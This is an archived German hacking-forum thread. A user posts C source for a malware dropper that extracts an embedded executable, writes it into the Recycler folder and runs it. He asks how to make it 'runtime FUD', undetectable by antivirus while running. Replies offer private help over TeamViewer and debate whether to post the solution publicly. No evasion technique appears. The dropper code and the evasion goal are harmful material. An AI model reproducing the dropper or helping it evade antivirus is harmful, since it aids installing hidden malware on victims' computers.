PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [C] runtime?! need help..



Schmoggi²
03.11.2008, 21:31
hey leutz

mein Problem ist folgendes:

meine 123.exe ist Scanntime fud aber wenn ich sie mit dem unten stehendem Code auch runtime Fud machen möchte wird das ganze wieder erkannt und so mit schließe ich das der C code erkannt wird bzw das dropen der resscource

weiß jemand ne lösung dafür zb eine methode den quellcode zu encodieren aber er immer noch funkt oder ne andere möglichkeit?

sollte halt runtime fud werden


main.c :


#define STRICT
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "res.h"

int main(){
LPVOID datel = LockResource ( LoadResource (0, FindResource (0, MAKEINTRESOURCE(ID_FILE_01), "BINARY")));

FILE *datei = fopen ("C:\\RECYCLER\\trash.exe", "wb");
if (datei != NULL)
{
fwrite(datel, 1, 654321, datei);
fclose(datei);
}
ShellExecute(0,"open","C:\\RECYCLER\\trash.exe", 0,0, SW_SHOWNORMAL);
return 0;
}

]=-antr4xx-=[
03.11.2008, 21:51
Ich kann dir mal via Teamviewer helfen wenn du willst --> ICQ: 352-586-030

Schmoggi²
03.11.2008, 21:59
wie willste mir den per Tv helfen?
nur ne frage ^^

wie schon gesagt mein code funktioniert aber er wird detected oder der deop prozess wird detected

ziel ist halt die datei auch runtime fud zu bekommen

Planxty
03.11.2008, 22:01
er kann dir doch sogar was eintippen der Lerneffekt ist um einiges höher dadurch und sein aufwand auch also ist das nen ziemlich gutes angebot ;-)

]=-antr4xx-=[
03.11.2008, 22:03
witzbold. wenn ich den fertigen code hier poste, wird er es nicht verstehen, wenn ich es aber mit ihm zusammen aufbaue, wird er es nachher verstanden haben...

-[RiDER]-
03.11.2008, 22:22
...dafür hat aber kein anderer hier im Board die Möglichkeit es zu erfahren!

Und es verlangt keiner einen fertigen Kode von Dir. ;)
Die Antwort sollte nicht das Wie sein, sondern das Warum - wo also der Unterschied zum Tiemview, außer dem, dass die Frage im Board ungeklärt bleiben wird, wenn Ihr es unter Euch regelt?

GreetZ RiDER :D :D :D

f!l3st0rm
04.11.2008, 00:21
Wenn Ihr die Sache per TeamViewer erfolgreich geregelt habt, wärs trotzdem nett, wenn nachher ein (gut kommentierter) Code hier gepostet wird.

Ich (und viele andere auch) würden sich darüber freuen.

Leute die sich wirklich dafür interessieren werden es sicherlich verstehen und wenn nicht, dann gibts ja immer noch den Thread hier um weitere Fragen zu stellen.